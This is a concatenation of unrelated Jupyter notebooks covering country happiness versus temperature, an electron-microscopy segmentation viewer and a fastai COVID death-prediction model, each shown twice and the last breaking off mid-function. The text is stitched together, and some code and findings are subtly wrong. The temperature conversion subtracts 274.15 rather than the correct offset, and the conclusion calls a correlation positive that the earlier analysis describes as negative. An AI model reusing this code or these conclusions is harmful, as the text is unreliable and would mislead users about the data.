Figure 2.1 illustrates the average temperature variation for the top 10 happiest countries. Specifically, an average of the average daily temperature is taken for each month from January to October and is plotted on a horizontal boxplot.
This figure shows that the โhappiestโ countries tend to have a very large range in temperature across the year. For majority of the countries considered here, the differences in average yearly temperature may in fact not be statistically different as they fall within the middle 50% range of the boxplot. Furthermore, for majority of the countries the average temperature falls within the range of 5 and 10 degrees Celsius.
```
happiness_tempvar_Hboxplot(bottom10_Countries,"Fig 2.2: Temperature range of top 10 least happy countries")
```
Figure 2.2 inversely shows the yearly temperature variation of the top 10 least happy countries. This figure is significantly different to figure 2.1 in three different ways. Firstly, the temperature variation for each country is much smaller, with all but one of the boxplots having 50% of it's average weather values falling within a range of 5 degrees C or less. Secondly, the countries tend not to overlap each other in terms of their average temperature, with most of them having quite distinct average temperatures with little fluctuation. The final key difference is that each country tends to have a much higher temperature than the top 10 happiest countries. This is a glaring difference as majority of the least happy countries have a temperature above 20 degrees Celsius whilst none of the happiest countries contain 20 degrees Celsius in their temperature range, including outlier months. In fact, all but one of the top 10 happiest countries contains a temperature as high as 15 degrees Celsius in their boxplot's interquartile range suggesting a difference of 5 degrees Celsius between the happiest and least happiest countries.
```
hapiness_temp_3plots(df_weather_happy_country)
```
Figure 3 delves deeper into the analysis of average yearly temperature and happiness index segmented by various temperature thresholds. The thresholds have been chosen based on the analysis of the previous pair of figures which showed clear divisions in average temperature between the happiest and least happiest countries as: less than 15 degrees Celsius, 15 โ 20 degrees Celsius and greater than 20 degrees Celsius. From the graphs there is a negative relationship between average temperature and happiness for countries that have a temperature less than 20 degrees Celsius, more pronounced among countries with a temperature between 15 and 20 degrees Celsius. However, among countries with an average temperature above 20 degrees Celsius there appears to be no relationship between happiness and temperature as shown by the largely horizontal line of best fit.
In conclusion, the key findings from this analysis are that overall people in countries with a lower average temperature tend to be happier however this does not appear to hold true for countries with a temperature above 20 degrees Celsius on average. Additionally, people in countries with greater variability in temperature across the year tend to be happier.
# Limitations
A key limitation encountered in analysing the implications of various policies in response to Covid-19 includes data collection and definition discrepancies within countries. This is the case as measurements such as the number of confirmed cases would be directly related to amount of testing and testing strategies employed by each country, similarly the number of Covid-19 related deaths would depend on how each country records deaths as related to COVID-19 considering other comorbidities. Such variations in the collection of data limit the ability to compare outcomes regarding covid-19 across countries. An example of this is with Tanzania which stopped all public testing on 29th April. The scope of this analysis is therefore limited to being more descriptive in nature as it would be beyond the scope and quite challenging based on the aforementioned factors to quantify the impact of specific policies.
A challenge presented with the definition of the โhappiness indexโ. Happiness is a highly subjective variable with determinants of happiness varying substantially between various regions and cultures. The perspective taken when constructing such an index runs the risk of being either too vague that it does not capture meaningful information or specific and biased towards one world-view or perspective that it does not provide a fair global comparison. Additionally, the construction of an index representing the happiness of an entire country may be misleading for countries that have huge socio-economic disparities or several highly distinct cultures and people. Possible extensions to this analysis could consider comparisons between weather and happiness across various happiness indexes.
Further limitations of the analysis of temperature and happiness are that temperature can vary greatly within both countries, although the countries considered were limited by size a trade-off had to be made based on how much in-country variation to allow buy considering larger countries versus how large of a global scope the analysis can cover, the decision was made to prioritize coverage at a global level and therefore the smallest ~75% of countries were considered.
An overall limitation of descriptive analysis is that although general correlations between variables can be identified, such analysis can not determine causation between two variables. This was clear in part two where although an overall positive correlation was identified between temperature and a countries happiness index, there would still exist several other factors that influence happiness that have not been considered and there is no clear explanation of how increased temperature relates to increases in happiness. Therefore, although descriptive analysis can provide a good starting point to explore the relationship between various variables it is not the final point.
|
github_jupyter
|
try:
import seaborn as sns
if sns.__version__ == "0.11.0":
pass
else:
import sys
!{sys.executable} -m pip install --upgrade seaborn==0.11.0
except ModuleNotFoundError:
import sys
!{sys.executable} -m pip install seaborn==0.11.0
import seaborn as sns
print(sns.__version__ == "0.11.0")
import psycopg2
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
from matplotlib.dates import DateFormatter
import matplotlib as mpl
#mpl.rcParams['figure.dpi'] = 200
import seaborn as sns
import numpy as np
import pandas as pd
import math
import datetime
from bs4 import BeautifulSoup
# Wikipedia API
import wikipedia
#wikipedia.set_lang("en")
# Load in happiness data
happiness_index_wikiObj = wikipedia.page("World Happiness Report", preload=True) #preload=True
happiness_index_html = happiness_index_wikiObj.html()
soup = BeautifulSoup(happiness_index_html, 'html.parser')
Happiness_index_2020_soup = soup.find('table',{'class':"wikitable"})
df_Happiness_2020 = pd.read_html(str(Happiness_index_2020_soup))
df_Happiness_2020 = pd.DataFrame(df_Happiness_2020[0])
# Load in weather data
conn = psycopg2.connect(
host='covid19db.org',
port=5432,
dbname='covid19',
user='covid19',
password='******')
cur = conn.cursor()
sql_command_1 = """SELECT date, country, countrycode, AVG(temperature_mean_avg) AS temperature_mean_avg
, AVG(sunshine_mean_avg) AS sunshine_mean_avg
FROM weather
WHERE date > '2019-12-31' AND date<'2020-11-01'
AND source= 'MET'
GROUP BY date, country, countrycode
"""
sql_command_2 = """ SELECT countrycode,value
FROM world_bank
WHERE indicator_name = 'Land area (sq. km)'
AND value<450000 AND year > 1960 """
df_weather = pd.read_sql(sql_command_1, conn)
df_LandSizes = pd.read_sql(sql_command_2, conn)
conn.close()
# Limit to countries with a landsize less than 450,000 (~75% of countries in the world)
df_weather = df_weather.merge(df_LandSizes,
how='inner',
on='countrycode')
assert df_weather.isna().sum().sum() == 0, "Null values present"
# Convert units date, Temperature Kelvin to Celius
df_weather['date'] = pd.to_datetime(df_weather['date'],format='%Y-%m-%d')
df_weather['temperature_mean_avg_C'] = df_weather['temperature_mean_avg'].apply(lambda x: x-274.15)
df_weather_avg = df_weather[['date', 'countrycode', 'country', 'temperature_mean_avg_C']].groupby(['country']).mean()
df_weather_happy_country = df_Happiness_2020[['Score','Overall rank', 'Country or region']].merge(df_weather_avg
, how='inner'
, left_on='Country or region'
, right_on = 'country')
# Function to plot scatter plot of happiness vs temperature with line of best fit
def happiness_temperature_scatter(df):
sns.set_theme(style="whitegrid")
fig, ax1 = plt.subplots()
fig.set_dpi(150)
df.sort_values("temperature_mean_avg_C", inplace=True)
y=df["Score"]
x=df["temperature_mean_avg_C"]
g = ax1.scatter(x, y, c=x, cmap='Spectral_r')
ax1.scatter(x, y, c=x, cmap='Spectral_r')
ax1.set_title('Figure 1: Average temperature and happiness score')
ax1.set_ylabel('Country happiness score')
fig.colorbar(g,orientation='horizontal',pad=0.02,ticks=ax1.get_xticks(),anchor=(0,0), panchor=(0.1,0)
,spacing='uniform',extendfrac='auto',fraction=0.07, label = 'Average Temperature (Degrees Celcius)')
ax1.set_xlabel(None)
ax1.set_xticklabels([None])
model2 = np.poly1d(np.polyfit(x, y, 1))
ax1.plot(x, model2(x))
df_weather['month'] = df_weather['date'].apply(lambda x: x.month_name())
df_weather_avg_2 = df_weather[['date', 'country', 'temperature_mean_avg_C','month']].groupby(['country','month']).mean()
df_weather_happy_country_month = df_Happiness_2020[['Score','Overall rank', 'Country or region']].merge(df_weather_avg_2
, how='inner'
, left_on='Country or region'
, right_on = 'country')
top10_Countries = df_weather_happy_country_month.sort_values(by='Overall rank', ascending= True)[:100]
bottom10_Countries = df_weather_happy_country_month.sort_values('Overall rank', ascending= True)[-100:]
# Function to plot boxplot of 10 countries with the variation in weather
def happiness_tempvar_Hboxplot(df,plot_title):
sns.set_theme(style="ticks")
fig, ax1 = plt.subplots()
fig.set_dpi(150)
#fig.set_size_inches(3,2)
sns.boxplot(data=df, x="temperature_mean_avg_C", y="Country or region"
, whis=[0, 100], width=.7, palette="vlag")
sns.stripplot(data=df, x="temperature_mean_avg_C", y="Country or region"
, size=4, color=".3", linewidth=0)
ax1.xaxis.grid(True)
ax1.set(ylabel="Countries ordered by \n happiness score (Descending)")
ax1.set_title(plot_title)
ax1.set_xlabel("Average temperature (Degrees Celcius)")
#print(dir(ax))
sns.despine(trim=False, left=False)
df_weather_happy_country['temp_range'] = df_weather_happy_country['temperature_mean_avg_C'].apply(lambda x: "less than 15 degrees celcius" if x<15
else
"Greater than 20 degrees celcius" if x>20
else "15 - 20 degrees celcius" )
# Function to plot scatter graph of average temperature and happiness divided between three temperature ranges
def hapiness_temp_3plots(df):
graph = sns.FacetGrid(df, col ='temp_range',legend_out=True,sharex=False)
graph.map(sns.regplot, "temperature_mean_avg_C", "Score").add_legend()
graph.fig.set_size_inches(15,5)
graph.fig.set_constrained_layout_pads(w_pad = 0.001, h_pad = 5.0/70.0 ,
hspace = 0.7, wspace = 0.7)
graph.set_xlabels("Average temperature (Degrees Celcius)")
graph.set_ylabels("Happiness index")
graph.fig.set_dpi(300)
plt.show()
#hapiness_temp_3plots(df_weather_happy_country)
happiness_temperature_scatter(df_weather_happy_country)
happiness_tempvar_Hboxplot(top10_Countries,"Fig 2.1: Temperature range of top 10 happiest countries")
happiness_tempvar_Hboxplot(bottom10_Countries,"Fig 2.2: Temperature range of top 10 least happy countries")
hapiness_temp_3plots(df_weather_happy_country)
| 0.384565 | 0.960768 |
```
from __future__ import print_function
import sys, os, math
import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
import seaborn as sns
sns.set_style('dark')
sns.set_context('talk')
from lightning import Lightning
# Load PyGreentea
# Relative path to where PyGreentea resides
pygt_path = '/groups/turaga/home/turagas/research/caffe_v1/PyGreentea'
sys.path.append(pygt_path)
import PyGreentea as pygt
cmap = matplotlib.colors.ListedColormap(np.vstack(((0,0,0),np.random.rand(255,3))))
# Load the datasets
raw_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/img_normalized.h5'
gt_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
aff_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_aff.h5'
testeu_h5_fname = 'test_out_0.h5'
test_h5_fname = 'test_out_0.h5'
raw_h5f = h5py.File(raw_h5_fname,'r')
gt_h5f = h5py.File(gt_h5_fname,'r')
aff_h5f = h5py.File(aff_h5_fname,'r')
testeu_h5f = h5py.File(testeu_h5_fname,'r')
test_h5f = h5py.File(test_h5_fname,'r')
raw = raw_h5f['main']
gt = gt_h5f['main']
aff = aff_h5f['main']
testeu = testeu_h5f['main']
test = test_h5f['main']
z=50; offset=44
plt.rcParams['figure.figsize'] = (18.0, 12.0)
raw_slc=np.transpose(np.squeeze(raw[z+offset,:,:]),(1,0));
gt_slc=np.transpose(np.squeeze(gt[z+offset,:,:]),(1,0))
aff_slc=np.transpose(np.squeeze(aff[:3,z+offset,:,:]),(2,1,0)).astype(np.float)
testeu_slc=np.transpose(np.squeeze(testeu[:3,z,:,:]),(2,1,0))
test_slc=np.transpose(np.squeeze(test[:3,z,:,:]),(2,1,0))
plt.rcParams['figure.figsize'] = (18.0, 12.0)
plt.subplot(2,3,1)
plt.axis('off')
plt.imshow(raw_slc,cmap=plt.cm.get_cmap('gray'))
plt.imshow(gt_slc,cmap=cmap,alpha=0.15);
plt.subplot(2,3,2)
plt.axis('off')
plt.imshow(gt_slc,cmap=cmap);
plt.subplot(2,3,3)
plt.axis('off')
plt.imshow(aff_slc,cmap=plt.cm.get_cmap('gray'));
plt.subplot(2,3,5)
plt.axis('off')
plt.imshow(testeu_slc,cmap=plt.cm.get_cmap('gray'));
plt.subplot(2,3,6)
plt.axis('off')
plt.imshow(test_slc,cmap=plt.cm.get_cmap('gray'));
plt.show()
# These are a set of functions to aid viewing of 3D EM images and their
# associated affinity graphs
import os
import matplotlib.cm as cm
import matplotlib
import numpy as np
from matplotlib.widgets import Slider, Button, RadioButtons
import matplotlib.pyplot as plt
import h5py
import array
#Displays three images: the raw data, the corresponding labels, and the predictions
def display(raw, label, seg, im_size=250, im2_size=432):
cmap = matplotlib.colors.ListedColormap(np.vstack(((0,0,0),np.random.rand(255,3))))
fig = plt.figure(figsize=(20,10))
fig.set_facecolor('white')
ax1,ax2,ax3 = fig.add_subplot(1,3,1),fig.add_subplot(1,3,2),fig.add_subplot(1,3,3)
fig.subplots_adjust(left=0.2, bottom=0.25)
depth0 = 0
zoom0 = 250
#Image is grayscale
print 'shape',np.array(raw[1,:,:]).shape
im1 = ax1.imshow(raw[1,:,:],cmap=cm.Greys_r)
ax1.set_title('Raw Image')
im = np.zeros((im_size,im_size,3))
im[:,:,:]=label[1,:,:,:]
im2 = ax2.imshow(im)
ax2.set_title('Groundtruth')
im_ = np.zeros((im2_size,im2_size))
im_[:,:]=seg[1,:,:]
print 'shape',np.array(im_).shape
im3 = ax3.imshow(im_,cmap=cmap)
ax3.set_title('Seg')
axdepth = fig.add_axes([0.25, 0.3, 0.65, 0.03], axisbg='white')
#axzoom = fig.add_axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)
depth = Slider(axdepth, 'Min', 0, im_size, valinit=depth0,valfmt='%0.0f')
#zoom = Slider(axmax, 'Max', 0, 250, valinit=max0)
def update(val):
z = int(depth.val)
im1.set_data(raw[z,:,:])
im[:,:,:]=label[z,:,:,:]
im2.set_data(im)
im_[:,:]=seg[z,:,:]
im3.set_data(im_)
fig.canvas.draw()
depth.on_changed(update)
plt.show()
## Just to access the images...
data_folder = 'nobackup/turaga/data/fibsem_medulla_7col/tstvol-520-1-h5/'
os.chdir('/.')
#Open training data
f = h5py.File(data_folder + 'img_normalized.h5', 'r')
data_set = f['main'] #520,520,520, z,y,x
print data_set.shape
#Open training labels
g = h5py.File(data_folder + 'groundtruth_aff.h5', 'r')
label_set = np.asarray(g['main'],dtype='float32') #3,520,520,520 3,z,y,x
print label_set.shape
# transpose so they match image
label_set = np.transpose(label_set,(1,2,3,0)) # z,y,x,3
hdf5_seg_file = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
hdf5_seg = h5py.File(hdf5_seg_file, 'r')
seg = np.asarray(hdf5_seg['main'],dtype='uint32')
print 'seg:',seg.shape,np.max(seg),np.min(seg)
# reshape labels, image
gt_data_dimension = label_set.shape[0]
data_dimension = seg.shape[1]
if gt_data_dimension != data_dimension:
padding = (gt_data_dimension - data_dimension) / 2
print(data_set.shape,padding)
data_set = data_set[padding:(-1*padding),padding:(-1*padding),padding:(-1*padding)]
print("label_set before",label_set.shape)
label_set = label_set[padding:(-1*padding),padding:(-1*padding),padding:(-1*padding),:]
print("label_set",label_set.shape)
display(data_set, label_set, seg, im_size=520, im2_size=520)
hdf5_seg_file = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
hdf5_seg = h5py.File(hdf5_seg_file, 'r')
seg = np.asarray(hdf5_seg['main'],dtype='uint32')
#print seg[0:30]
print 'seg:',seg.shape,np.max(seg),np.min(seg)
```
|
github_jupyter
|
from __future__ import print_function
import sys, os, math
import h5py
import numpy as np
import matplotlib.pyplot as plt
import matplotlib
%matplotlib inline
import seaborn as sns
sns.set_style('dark')
sns.set_context('talk')
from lightning import Lightning
# Load PyGreentea
# Relative path to where PyGreentea resides
pygt_path = '/groups/turaga/home/turagas/research/caffe_v1/PyGreentea'
sys.path.append(pygt_path)
import PyGreentea as pygt
cmap = matplotlib.colors.ListedColormap(np.vstack(((0,0,0),np.random.rand(255,3))))
# Load the datasets
raw_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/img_normalized.h5'
gt_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
aff_h5_fname = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_aff.h5'
testeu_h5_fname = 'test_out_0.h5'
test_h5_fname = 'test_out_0.h5'
raw_h5f = h5py.File(raw_h5_fname,'r')
gt_h5f = h5py.File(gt_h5_fname,'r')
aff_h5f = h5py.File(aff_h5_fname,'r')
testeu_h5f = h5py.File(testeu_h5_fname,'r')
test_h5f = h5py.File(test_h5_fname,'r')
raw = raw_h5f['main']
gt = gt_h5f['main']
aff = aff_h5f['main']
testeu = testeu_h5f['main']
test = test_h5f['main']
z=50; offset=44
plt.rcParams['figure.figsize'] = (18.0, 12.0)
raw_slc=np.transpose(np.squeeze(raw[z+offset,:,:]),(1,0));
gt_slc=np.transpose(np.squeeze(gt[z+offset,:,:]),(1,0))
aff_slc=np.transpose(np.squeeze(aff[:3,z+offset,:,:]),(2,1,0)).astype(np.float)
testeu_slc=np.transpose(np.squeeze(testeu[:3,z,:,:]),(2,1,0))
test_slc=np.transpose(np.squeeze(test[:3,z,:,:]),(2,1,0))
plt.rcParams['figure.figsize'] = (18.0, 12.0)
plt.subplot(2,3,1)
plt.axis('off')
plt.imshow(raw_slc,cmap=plt.cm.get_cmap('gray'))
plt.imshow(gt_slc,cmap=cmap,alpha=0.15);
plt.subplot(2,3,2)
plt.axis('off')
plt.imshow(gt_slc,cmap=cmap);
plt.subplot(2,3,3)
plt.axis('off')
plt.imshow(aff_slc,cmap=plt.cm.get_cmap('gray'));
plt.subplot(2,3,5)
plt.axis('off')
plt.imshow(testeu_slc,cmap=plt.cm.get_cmap('gray'));
plt.subplot(2,3,6)
plt.axis('off')
plt.imshow(test_slc,cmap=plt.cm.get_cmap('gray'));
plt.show()
# These are a set of functions to aid viewing of 3D EM images and their
# associated affinity graphs
import os
import matplotlib.cm as cm
import matplotlib
import numpy as np
from matplotlib.widgets import Slider, Button, RadioButtons
import matplotlib.pyplot as plt
import h5py
import array
#Displays three images: the raw data, the corresponding labels, and the predictions
def display(raw, label, seg, im_size=250, im2_size=432):
cmap = matplotlib.colors.ListedColormap(np.vstack(((0,0,0),np.random.rand(255,3))))
fig = plt.figure(figsize=(20,10))
fig.set_facecolor('white')
ax1,ax2,ax3 = fig.add_subplot(1,3,1),fig.add_subplot(1,3,2),fig.add_subplot(1,3,3)
fig.subplots_adjust(left=0.2, bottom=0.25)
depth0 = 0
zoom0 = 250
#Image is grayscale
print 'shape',np.array(raw[1,:,:]).shape
im1 = ax1.imshow(raw[1,:,:],cmap=cm.Greys_r)
ax1.set_title('Raw Image')
im = np.zeros((im_size,im_size,3))
im[:,:,:]=label[1,:,:,:]
im2 = ax2.imshow(im)
ax2.set_title('Groundtruth')
im_ = np.zeros((im2_size,im2_size))
im_[:,:]=seg[1,:,:]
print 'shape',np.array(im_).shape
im3 = ax3.imshow(im_,cmap=cmap)
ax3.set_title('Seg')
axdepth = fig.add_axes([0.25, 0.3, 0.65, 0.03], axisbg='white')
#axzoom = fig.add_axes([0.25, 0.15, 0.65, 0.03], axisbg=axcolor)
depth = Slider(axdepth, 'Min', 0, im_size, valinit=depth0,valfmt='%0.0f')
#zoom = Slider(axmax, 'Max', 0, 250, valinit=max0)
def update(val):
z = int(depth.val)
im1.set_data(raw[z,:,:])
im[:,:,:]=label[z,:,:,:]
im2.set_data(im)
im_[:,:]=seg[z,:,:]
im3.set_data(im_)
fig.canvas.draw()
depth.on_changed(update)
plt.show()
## Just to access the images...
data_folder = 'nobackup/turaga/data/fibsem_medulla_7col/tstvol-520-1-h5/'
os.chdir('/.')
#Open training data
f = h5py.File(data_folder + 'img_normalized.h5', 'r')
data_set = f['main'] #520,520,520, z,y,x
print data_set.shape
#Open training labels
g = h5py.File(data_folder + 'groundtruth_aff.h5', 'r')
label_set = np.asarray(g['main'],dtype='float32') #3,520,520,520 3,z,y,x
print label_set.shape
# transpose so they match image
label_set = np.transpose(label_set,(1,2,3,0)) # z,y,x,3
hdf5_seg_file = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
hdf5_seg = h5py.File(hdf5_seg_file, 'r')
seg = np.asarray(hdf5_seg['main'],dtype='uint32')
print 'seg:',seg.shape,np.max(seg),np.min(seg)
# reshape labels, image
gt_data_dimension = label_set.shape[0]
data_dimension = seg.shape[1]
if gt_data_dimension != data_dimension:
padding = (gt_data_dimension - data_dimension) / 2
print(data_set.shape,padding)
data_set = data_set[padding:(-1*padding),padding:(-1*padding),padding:(-1*padding)]
print("label_set before",label_set.shape)
label_set = label_set[padding:(-1*padding),padding:(-1*padding),padding:(-1*padding),:]
print("label_set",label_set.shape)
display(data_set, label_set, seg, im_size=520, im2_size=520)
hdf5_seg_file = '/groups/turaga/home/turagas/data/FlyEM/fibsem_medulla_7col/tstvol-520-1-h5/groundtruth_seg_thick.h5'
hdf5_seg = h5py.File(hdf5_seg_file, 'r')
seg = np.asarray(hdf5_seg['main'],dtype='uint32')
#print seg[0:30]
print 'seg:',seg.shape,np.max(seg),np.min(seg)
| 0.391522 | 0.335786 |
# Read Libraries
```
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import KFold
from sklearn.preprocessing import OneHotEncoder
from sklearn import metrics
#Light GBM
from fastai.tabular import *
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
PATH = '/media/maria/2TB Monster driv/PrecisionFDA/'
PATH_COVID = '/media/maria/2TB Monster driv/PrecisionFDA/LightGBM/COVID/'
from fastai.callbacks import *
```
# Read Data
```
train = pd.read_csv(PATH + 'Descriptive/train.csv')
test = pd.read_csv(PATH + 'Descriptive/test.csv')
nocovid = pd.read_csv(PATH_COVID + 'no_covid_predicted.csv')
#Remove no covid
train = train.loc[train.COVID_Status == 1]
train.shape
oof_df = train[["Id", "Death"]]
train.drop(columns=['COVID_Status', 'Hospitalized', 'Ventilator', 'ICU', 'Id',
'Days_hospitalized', 'Days_ICU', 'Death Certification'], inplace=True)
#Display all database
def display_all(df):
with pd.option_context("display.max_rows", 1000, "display.max_columns", 1000):
display(df)
display_all(train.describe())
```
# Training Neural Network
```
procs = [FillMissing, Categorify, Normalize]
dep_var = 'Death'
cat_names = ['DRIVERS' , 'PASSPORT', 'MARITAL', 'RACE', 'ETHNICITY',
'GENDER', 'COUNTY', 'PLACE_BIRTH']
PATH_data = PATH + 'Descriptive/'
#https://www.kaggle.com/dromosys/fast-ai-v1-focal-loss
from torch import nn
import torch.nn.functional as F
#Parameters of focal loss
class FocalLoss(nn.Module):
def __init__(self, alpha=1, gamma=5, logits=False, reduction='elementwise_mean'):
super(FocalLoss, self).__init__()
self.alpha = alpha
self.gamma = gamma
self.logits = logits
self.reduction = reduction
def forward(self, inputs, targets):
if self.logits:
BCE_loss = F.binary_cross_entropy_with_logits(inputs, targets, reduction='none')
else:
BCE_loss = F.binary_cross_entropy(inputs, targets, reduction='none')
pt = torch.exp(-BCE_loss)
F_loss = self.alpha * (1-pt)**self.gamma * BCE_loss
if self.reduction is None:
return F_loss
else:
return torch.mean(F_loss)
# Setting random seed
SEED = 2019
def seed_everything(seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
#tf.set_random_seed(seed)
seed_everything(SEED)
def auroc_score(input, target):
input, target = input.cpu().numpy()[:,1], target.cpu().numpy()
return roc_auc_score(target, input)
class AUROC(Callback):
_order = -20 #Needs to run before the recorder
def __init__(self, learn, **kwargs): self.learn = learn
def on_train_begin(self, **kwargs): self.learn.recorder.add_metric_names(['AUROC'])
def on_epoch_begin(self, **kwargs): self.output, self.target = [], []
def on_batch_end(self, last_target, last_output, train, **kwargs):
if not train:
self.output.append(last_output)
self.target.append(last_target)
def on_epoch_end(self, last_metrics, **kwargs):
if len(self.output) > 0:
output = torch.cat(self.output)
target = torch.cat(self.target)
preds = F.softmax(output, dim=1)
metric = auroc_score(preds, target)
return add_metrics(last_metrics,[metric])
len(test)
#5 Fold cross-validation
nfold = 5
target = 'Death'
skf = KFold(n_splits=nfold, shuffle=True, random_state=2019)
oof = np.zeros(len(train))
predictions = np.zeros(len(test))
train['Death'].describe()
test.shape
dep_var
#Find Learning Rate
i = 1
cont_names = set(train) - set(cat_names) - {dep_var}
for train_index, valid_idx in skf.split(train, train.Death.values):
if i>1:
break
print("\nfold {}".format(i))
data= (TabularList.from_df(train, path=PATH_data, cat_names=cat_names, cont_names= cont_names, procs=procs)
.split_by_idx(valid_idx)
.label_from_df(cols=dep_var, label_cls=CategoryList)
.databunch(bs=4096))
learn = tabular_learner(data, layers=[3600, 1800], emb_drop=0.05, metrics=accuracy) #like rossmann
#learn.loss_fn = FocalLoss()
learn.lr_find()
learn.recorder.plot()
i=i+1
i = 1
lr = 1e-2
for train_index, valid_idx in skf.split(train, train.Death.values):
print("\nfold {}".format(i))
data = (TabularList.from_df(train, path=PATH_data, cat_names=cat_names, cont_names= cont_names, procs=procs)
.split_by_idx(valid_idx)
.label_from_df(cols=dep_var, label_cls=CategoryList)
.add_test(TabularList.from_df(test, path=PATH_data, cat_names=cat_names, cont_names= cont_names))
.databunch(bs=4096))
learn = tabular_learner(data, layers=[3600, 1800], emb_drop=0.05, metrics=accuracy) #like rossmann
#learn.loss_fn = FocalLoss()
learn.fit_one_cycle(15, slice(lr), callbacks=[AUROC(learn),SaveModelCallback(learn, every='improvement',
monitor='valid_loss', name='bestmodel_death_fold{}'.format(i))],
wd=0.1)
learn.load('bestmodel_death_fold{}'.format(i))
interp = ClassificationInterpretation.from_learner(learn)
from sklearn import metrics
print(metrics.classification_report(interp.y_true.numpy(), interp.pred_class.numpy()))
preds_valid = learn.get_preds(ds_type=DatasetType.Valid)
predictions_v = []
for j in range(len(valid_idx)):
predictions_v.append(float(preds_valid[0][j][1].cpu().numpy()))
oof[valid_idx] = predictions_v
preds = learn.get_preds(ds_type=DatasetType.Test)
predictions_t = []
for j in range(test.shape[0]):
predictions_t.append(float(preds[0][j][1].cpu().numpy()))
predictions += predictions_t
i = i + 1
print("\n\nCV AUC: {:<0.5f}".format(metrics.roc_auc_score(train.Death.values.astype(bool), oof)))
print("\n\nCV log loss: {:<0.5f}".format(metrics.log_loss(train.Death.values.astype(bool), oof)))
print("\n\nCV Gini: {:<0.5f}".format(2 * metrics.roc_auc_score(train.Death.values.astype(bool), oof) -1))
#threshold optimization
maximum = 0
for i in range(1000):
f1 = metrics.f1_score(train.Death.values.astype(bool), oof >i*.001)
if f1 > maximum:
maximum=f1
threshold = i*0.001
print(f'Maximum f1 value: {maximum}' , f'Probability cutoff: {threshold}' )
print(metrics.classification_report(train.Death.values.astype(bool), oof >threshold))
```
# Explanations
```
pred = oof
#code from https://forums.fast.ai/t/feature-importance-in-deep-learning/42026/6
def feature_importance(learner, cat_names, cont_names):
# based on: https://medium.com/@mp.music93/neural-networks-feature-importance-with-fastai-5c393cf65815
loss0 = np.array([learner.loss_func(learner.pred_batch(batch=(x,y.to("cpu"))), y.to("cpu")) for x,y in iter(learner.data.valid_dl)]).mean()
fi = dict()
types = [cat_names, cont_names]
for j, t in enumerate(types):
for i, c in enumerate(t):
loss = []
for x,y in iter(learner.data.valid_dl):
col = x[j][:,i] #x[0] da hier cat-vars
idx = torch.randperm(col.nelement())
x[j][:,i] = col.view(-1)[idx].view(col.size())
y = y.to('cpu')
loss.append(learner.loss_func(learner.pred_batch(batch=(x,y)), y))
fi[c] = np.array(loss).mean()-loss0
d = sorted(fi.items(), key = lambda kv: kv[1], reverse = True)
return pd.DataFrame({'cols': [l for l, v in d], 'imp': np.log1p([v for l, v in d])})
imp = feature_importance(learn, cat_names, cont_names)
imp[:20].plot.barh(x="cols", y="imp", figsize=(10, 10))
from sklearn.metrics import roc_curve
import matplotlib.pyplot as plt
fpr_rf, tpr_rf, _ = roc_curve(train.Death.values.astype(bool), oof)
plt.figure(1)
plt.plot([0, 1], [0, 1], 'k--')
plt.plot(fpr_rf, tpr_rf, label='RF')
plt.xlabel('False positive rate')
plt.ylabel('True positive rate')
plt.title('ROC curve')
plt.legend(loc='best')
plt.show()
sub_df = pd.read_csv(PATH + 'Descriptive/test.csv')
sub_df["Death"] = predictions/nfold
nocovid["COVID_flag"] = 0
sub_df = sub_df.merge(nocovid, how='left', left_on ='Id', right_on ='Id')
sub_df['COVID_flag'] = sub_df['COVID_flag'].fillna(1)
#If no covid all probabilities 0
sub_df["Death"] = sub_df["Death"] * sub_df['COVID_flag']
sub_df[['Id', 'Death']].to_csv("NN_Death_status.csv", index=False, line_terminator='\n', header=False)
np.mean(sub_df["Death"]/nfold)
```
|
github_jupyter
|
# This Python 3 environment comes with many helpful analytics libraries installed
# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python
# For example, here's several helpful packages to load in
import numpy as np # linear algebra
import pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)
from sklearn.metrics import roc_auc_score
from sklearn.model_selection import KFold
from sklearn.preprocessing import OneHotEncoder
from sklearn import metrics
#Light GBM
from fastai.tabular import *
# Input data files are available in the "../input/" directory.
# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory
PATH = '/media/maria/2TB Monster driv/PrecisionFDA/'
PATH_COVID = '/media/maria/2TB Monster driv/PrecisionFDA/LightGBM/COVID/'
from fastai.callbacks import *
train = pd.read_csv(PATH + 'Descriptive/train.csv')
test = pd.read_csv(PATH + 'Descriptive/test.csv')
nocovid = pd.read_csv(PATH_COVID + 'no_covid_predicted.csv')
#Remove no covid
train = train.loc[train.COVID_Status == 1]
train.shape
oof_df = train[["Id", "Death"]]
train.drop(columns=['COVID_Status', 'Hospitalized', 'Ventilator', 'ICU', 'Id',
'Days_hospitalized', 'Days_ICU', 'Death Certification'], inplace=True)
#Display all database
def display_all(df):
